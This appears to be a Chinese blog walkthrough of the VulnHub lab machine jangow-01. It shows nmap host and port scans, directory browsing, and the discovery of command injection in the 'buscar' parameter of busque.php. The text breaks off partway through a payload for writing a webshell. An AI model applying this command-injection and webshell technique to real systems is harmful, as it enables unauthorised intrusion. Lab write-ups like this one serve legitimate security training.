vuluhub_jangow-01-1.0.1
前言靶机:jangow-01-1.0.1
攻击机:kali linux2022.4
靶机描述
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214095347959-101662528.png
打靶ing
靶机探测
使用nmap扫描网段
点击查看代码┌──(root㉿kali)-
└─# nmap 192.168.70.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:56 EST
Nmap scan report for 192.168.70.1
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.70.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.70.2
Host is up (0.000056s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp opendomain
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.70.152
Host is up (0.00027s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp openftp
80/tcp openhttp
MAC Address: 00:0C:29:67:A6:61 (VMware)
Nmap scan report for 192.168.70.254
Host is up (0.00022s latency).
All 1000 scanned ports on 192.168.70.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:EA:9C:6A (VMware)
Nmap scan report for 192.168.70.137
Host is up (0.0000070s latency).
All 1000 scanned ports on 192.168.70.137 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (5 hosts up) scanned in 11.44 seconds发现靶机ip:192.168.70.152扫描开放端口信息
点击查看代码┌──(root㉿kali)-
└─# nmap -A -p- 192.168.70.152
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:59 EST
Nmap scan report for 192.168.70.152
Host is up (0.00042s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp openftp vsftpd 3.0.3
80/tcp openhttp Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZETIME FILENAME
| - 2021-06-10 18:05site/
|_
MAC Address: 00:0C:29:67:A6:61 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.70.152
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds查看网站信息
先访问80端口
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214100405351-1404659867.png
可以发现是一个目录遍历,查找一下有用信息
在site目录下发现一个网站
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214100554851-1079386142.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214100610408-136742029.png
漏洞探测
四处看看功能点
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214101111829-1853916370.png
发现了一个可以传参得接口
http://192.168.70.152/site/busque.php?buscar=
对变量buscar进行测试
传入参数1
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214101245494-551390602.png
没什么回显,传入id
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230214101330746-2084055498.png
在该参数发现存在rce
漏洞利用
利用该漏洞写入webshell
payload
192.168.70.152/site/busque.php?buscar=echo '
页:
[1]